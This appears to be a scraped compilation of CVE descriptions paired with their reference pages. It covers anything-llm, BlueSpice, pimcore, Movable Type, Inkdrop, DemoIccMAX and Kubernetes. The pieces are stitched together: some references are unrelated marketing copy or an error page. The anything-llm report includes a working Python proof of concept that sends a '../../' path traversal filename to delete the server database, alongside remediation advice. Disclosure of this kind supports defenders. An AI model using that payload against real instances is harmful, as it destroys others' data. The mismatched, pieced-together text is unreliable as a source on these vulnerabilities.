Improper Input Validation in GitHub repository mintplex-labs/anything-llm prior to 0.1.0.

**Description**

The /process endpoint of the python API (in collector/api.py) exposes an endpoint waiting for a POST request with a parameter named filename :

    @api.route("/process", methods=["POST"])
    def process_file():
        content = request.json
        target_filename = content.get("filename")
        print(f"Processing {target_filename}")
        success, reason = process_single(WATCH_DIRECTORY, target_filename)
        return json.dumps(
            {"filename": target_filename, "success": success, "reason": reason}
        )
    

Then, the filename is passed to the process_single function :

    def process_single(directory, target_doc):
      if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
      
      if os.path.exists(f"{directory}/{target_doc}") is False: 
        print(f"{directory}/{target_doc} does not exist.")
        return (False, f"{directory}/{target_doc} does not exist.")
    
      filename, fileext = os.path.splitext(target_doc)
      if filename in ['.DS_Store'] or fileext == '': return False
      if fileext == '.lock':
        print(f"{filename} is locked - skipping until unlocked")
        return (False, f"{filename} is locked - skipping until unlocked")
    
      if fileext not in FILETYPES.keys():
        print(f"{fileext} not a supported file type for conversion. It will not be processed.")
        move_source(new_destination_filename=target_doc, failed=True, remove=True)
        return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")
    

If filename **HAS** a file extension and that extension **IS NOT** among theses extensions :

    FILETYPES = {
        '.txt': as_text,
        '.md': as_markdown,
        '.pdf': as_pdf,
        '.docx': as_docx,
        '.odt': as_odt,
        '.mbox': as_mbox, 
    }
    

and if the filename points to an existing file, the following function is called (with failed=True, remove=True) :

    def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
        if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
            print(f"{new_destination_filename} deleted from filesystem")
            os.remove(f"{working_dir}/{new_destination_filename}")
            return
     
    

Thus, the file is deleted.

However, since the parameter filename is not sanitized against **PATH TRAVERSAL**, a filename such as ../../server/storage/anythingllm.db can be used to remove the database of the website.

**Proof of Concept**

    # PoC.py
    import requests
    
    if __name__ == "__main__":
        server_ip = "127.0.0.1"
        file_to_delete = "../../server/storage/anythingllm.db"
    
        data = {"filename" : file_to_delete}
        requests.post(f"http://{server_ip}:8888/process", json=data)
    

**Remediation****User input should be sanitized**

For file name parameters, Flask implement a function named secure_filename to manage filename securely, documentation can be found here. The function os.path.basename could also be used.

Moreover, it may be a better practice to use os.path.join instead of concatenating strings using +.

**Python API should only listen on loopback interface**

In the documentation (collector/README.md), the following command is mentioned to run the Python API :

    flask run --host '0.0.0.0' --port 8888
    

However, simply listening on 127.0.0.1 should be enough. The docker version seems 'safe' because only the port 3001 is exposed to the host (however it is still reachable from the docker0 interface on the host, but the attacker would need to be logged in the server).  
But using the manual installation method, it may results in a Python API exposed to the internet. Here is an example of an instance exposed to the Internet on shodan :

**Impact**

This vulnerability allows an unauthenticated attacker to delete almost any file, such as the server database.

**Occurrences**

CVE-2023-5832: Improper input validation leads to arbitrary file deletion in anything-llm

Improper Access Control in GitHub repository mintplex-labs/anything-llm prior to 0.1.0.

Expand Up @@ -239,6 +239,16 @@ function systemEndpoints(app) { async (request, response) \=> { try { const body \= reqBody(request);  
// Only admins can update the ENV settings. if (multiUserMode(response)) { const user \= await userFromSession(request, response); if (!user || user?.role !== "admin") { response.sendStatus(401).end(); return; } }  
const { newValues, error } \= updateENV(body); if (process.env.NODE\_ENV \=== "production") await dumpENV(); response.status(200).json({ newValues, error }); Expand All @@ -254,11 +264,21 @@ function systemEndpoints(app) { \[validatedRequest\], async (request, response) \=> { try { // Cannot update password in multi - user mode. if (multiUserMode(response)) { response.sendStatus(401).end(); return; }  
const { usePassword, newPassword } \= reqBody(request); const { error } \= updateENV({ AuthToken: usePassword ? newPassword : "", JWTSecret: usePassword ? v4() : "", }); const { error } \= updateENV( { AuthToken: usePassword ? newPassword : "", JWTSecret: usePassword ? v4() : "", }, true ); if (process.env.NODE\_ENV \=== "production") await dumpENV(); response.status(200).json({ success: !error, error }); } catch (e) { console.log(e.message, e); Expand Down Expand Up @@ -293,8 +313,15 @@ function systemEndpoints(app) { limit\_user\_messages: false, message\_limit: 25, }); process.env.AUTH\_TOKEN \= null; process.env.JWT\_SECRET \= process.env.JWT\_SECRET ?? v4(); // Make sure JWT\_SECRET is set for JWT issuance.  
updateENV( { AuthToken: null, JWTSecret: process.env.JWT\_SECRET ?? v4(), }, true ); if (process.env.NODE\_ENV \=== "production") await dumpENV(); await Telemetry.sendTelemetry("enabled\_multi\_user\_mode"); response.status(200).json({ success: !!user, error }); } catch (e) { Expand Down

CVE-2023-5833: Prevent updates of specific keys via API (#256) · Mintplex-Labs/anything-llm@d5b1f84

Cross-site Scripting (XSS) vulnerability in BlueSpiceAvatars extension of BlueSpice allows logged in user to inject arbitrary HTML into the profile image dialog on Special:Preferences. This only applies to the genuine user context.

Date

2023-10-30

Severity

Low

Affected

*   BlueSpiceAvatars

Fixed in

*   BlueSpiceAvatars 4.3.3
*   BlueSpiceAvatars 3.2.10.1

CVE

CVE-2023-42431

**Problem**

When setting the avatar profile image, one can cause an XSS attack by inserting a modified URL in the dialog. The issue only occurs in the dialog itself and only in the context of the user that applied the change.

**Solution**

*   BlueSpice 4: Update to version 4.3.3
*   BlueSpice 3: Update Extension:BlueSpiceAvatars version 3.2.10.1

**Acknowledgements**

Special thanks to the security team of an undisclosed customer.

CVE-2023-42431: Security:Security Advisories/BSSA-2023-02 - BlueSpice Wiki

Unverified Password Change in GitHub repository pimcore/admin-ui-classic-bundle prior to 1.2.0.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

\[Improvement\]: Check if new password is NOT the same as the old one w…

…hen resetting (#285)

\* add check that new passoword is different than old one

\* refactor empty old password check

\* add CHANGELOG

\* Update CHANGELOG.md

---------

Co-authored-by: Divesh Pahuja <divesh.pahuja@pimcore.com>

*   Loading branch information

Showing **2 changed files** with **6 additions** and **0 deletions**.

*   CHANGELOG.md
*   *   UserController.php

1 change: 1 addition & 0 deletions CHANGELOG.md

  

@@ -1,5 +1,6 @@

\#### v1.2.0

\- DataObject used to automatically reload version after save, but now it's triggered only on successfull save. The reload can be forced by setting \`forceReloadVersionsAfterSave\` to \`true\` in a \`postSaveObject\` event listener.

\- \[User -> Settings\] When resetting password, setting the new password same as the old one would throw an error.

  

\#### v1.1.0

\- \`Pimcore\\Bundle\\AdminBundle\\Service\\ElementService\` is marked as internal.

Expand Down

5 changes: 5 additions & 0 deletions src/Controller/Admin/UserController.php

Expand Up

@@ -589,6 +589,11 @@ public function updateCurrentUserAction(Request $request, ValidatorInterface $va

}

  

if ($oldPasswordCheck && $values\['new\_password'\] == $values\['retype\_password'\]) {

  

if (Tool\\Authentication::verifyPassword($user, $values\['new\_password'\])) {

throw new \\Exception('The new password cannot be the same as the old one');

}

  

$values\['password'\] = Tool\\Authentication::getPasswordHash($user\->getName(), $values\['new\_password'\]);

} else {

if (!$oldPasswordCheck) {

Expand Down

**0 comments on commit 498ac77**

Please sign in to comment.

CVE-2023-5844: [Improvement]: Check if new password is NOT the same as the old one w… · pimcore/admin-ui-classic-bundle@498ac77

In MLSoft TCO!stream versions 8.0.22.1115 and below, a vulnerability exists due to insufficient permission validation. This allows an attacker to make the victim download and execute arbitrary files.



















KISA 인터넷 보호나라&KrCERT

**죄송합니다.****페이지에서 오류가 발생했습니다.**

일시적인 오류일 경우 잠시 후에 다시 시도해 주시기 바랍니다  
만약 문제가 계속 발생되면 사이트관리자에게 연락해 주시기 바랍니다.

이전 페이지로 가기 처음으로 가기

CVE-2023-45799: egovframe common component

A Buffer overflow vulnerability in DreamSecurity MagicLine4NX versions 1.0.0.1 to 1.0.0.26 allows an attacker to remotely execute code.

CVE-2023-45797: egovframe common component

Cross-site scripting vulnerability in Movable Type series allows a remote authenticated attacker to inject an arbitrary script. Affected products/versions are as follows: Movable Type 7 r.5405 and earlier (Movable Type 7 Series), Movable Type Advanced 7 r.5405 and earlier (Movable Type 7 Series), Movable Type Premium 1.58 and earlier, Movable Type Premium Advanced 1.58 and earlier, Movable Type Cloud Edition (Version 7) r.5405 and earlier, and Movable Type Premium Cloud Edition 1.58 and earlier.

Published:2023/10/25  Last Updated:2023/10/25

**Overview**

Movable Type provided by Six Apart Ltd. contains a cross-site scripting vulnerability.

**Products Affected**

*   Movable Type 7 r.5405 and earlier (Movable Type 7 Series)
*   Movable Type Advanced 7 r.5405 and earlier (Movable Type 7 Series)
*   Movable Type Premium 1.58 and earlier
*   Movable Type Premium Advanced 1.58 and earlier
*   Movable Type Cloud Edition (Version 7) r.5405 and earlier
*   Movable Type Premium Cloud Edition 1.58 and earlier

**Description**

Movable Type provided by Six Apart Ltd. contains a cross-site scripting vulnerability (CWE-79).

**Impact**

An arbitrary script may be executed on a logged-in user's web browser.

**Solution**

**Update the Software**  
Apply the appropriate update according to the information provided by the developer.  
The developer has released the following updates that contain fix for this vulnerability:

*   Movable Type 7 r.5501 (Movable Type 7 Series)
*   Movable Type Advanced 7 r.5501 (Movable Type 7 Series)
*   Movable Type Premium 1.59
*   Movable Type Premium Advanced 1.59
*   Movable Type Cloud Edition (Version 7) r.5501
*   Movable Type Premium Cloud Edition 1.59

For more information, refer to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:N/AC:M/Au:S/C:N/I:P/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Six Apart Ltd. reported this vulnerability to JPCERT/CC to notify users of the solutions through JVN. JPCERT/CC and Six Apart Ltd. coordinated under the Information Security Early Warning Partnership.

**Other Information**

CVE-2023-45746: Movable Type vulnerable to cross-site scripting

Inkdrop prior to v5.6.0 allows a local attacker to conduct a code injection attack by having a legitimate user open a specially crafted markdown file.

**Solely designed for Markdown to improve your dev workflow**

Get a low-friction personal note-taking workflow and accomplish more. With your notes well-organized effortlessly, you can stay focused on doing your best work.

**A versatile Markdown editor**

It comes with multi-language code highlighting, multi-cursors, line numbers, scrolling beyond the last line, showing invisible characters and more.

**Focus on the work that matters**

An intuitive and clean user interface and 'Distraction free mode' don't distract you from the text.

**Get things done**

Track your work progress with note status and task progress view in the note list.

**Never lose your ideas**

Whenever, even while in offline, you can read and write notes. Just open up the app, then it will be instantly ready for you to start jotting down before you forget the idea.

With its high customizability, extensibility and 100+ plugins, it will stick with your workflow and improve your productivity.

Browse plugins 

**Make it your notebook**

Pick your favorite look and feel from the themes. You can also tweak your UI with CSS/Less to make it more comfortable for your jottings.

Browse themes 

How to tweak styles 

**Have it everywhere, securely**

Capture a note once, and it’s instantly available on all your devices. It syncs data securely with end-to-end encryption.

Learn more 

**Never lose your work**

Accidentally deleted lines? You can restore them from the revision history. A seamless backup keeps your notes safely stored in your local filesystem.

**Optional self-hosted database**

If you don't trust anyone with your data, you can set up your own CouchDB server to store your data instead of the Inkdrop server.

Learn more 

**Trusted by developers around the worldSee more**

**Get started today****Available on 5 platforms for just $4.16 per month (annual billing). No credit card information required for 30-day free trial.**

**Who is making Inkdrop?**

It is developed by an indie developer, Takuya Matsuyama, based in Japan.

CVE-2023-44141: Inkdrop - Note-taking App with Robust Markdown Editor

In International Color Consortium DemoIccMAX 79ecb74, CIccXformMatrixTRC::GetCurve in IccCmm.cpp in libSampleICC.a has a NULL pointer dereference.

CVE-2023-46867: Bugs from Fuzzing · Issue #54 · InternationalColorConsortium/DemoIccMAX

Kube-proxy
 on Windows can unintentionally forward traffic to local processes 
listening on the same port (“spec.ports[*].port”) as a LoadBalancer 
Service when the LoadBalancer controller
 does not set the “status.loadBalancer.ingress[].ip” field. Clusters 
where the LoadBalancer controller sets the 
“status.loadBalancer.ingress[].ip” field are unaffected.



**What type of PR is this?**

/kind bug

**What this PR does / why we need it:**

The PR fixes an issue where an empty IP address value in the load balancer ingress IP field is breaking the data path. Kube proxy doesn't honor the ingress IP address being empty and plumbs an invalid HNS policy. The fix prevents the plumbing of such invalid HNS policy.

**Which issue(s) this PR fixes:**

Fixes #99964

**Special notes for your reviewer:****Does this PR introduce a user-facing change?****Additional documentation e.g., KEPs (Kubernetes Enhancement Proposals), usage docs, etc.:**

CVE-2021-25736: For LoadBalancer Service type don't create a HNS policy for empty or invalid external loadbalancer IP by sbangari · Pull Request #99958 · kubernetes/kubernetes

Source

CVE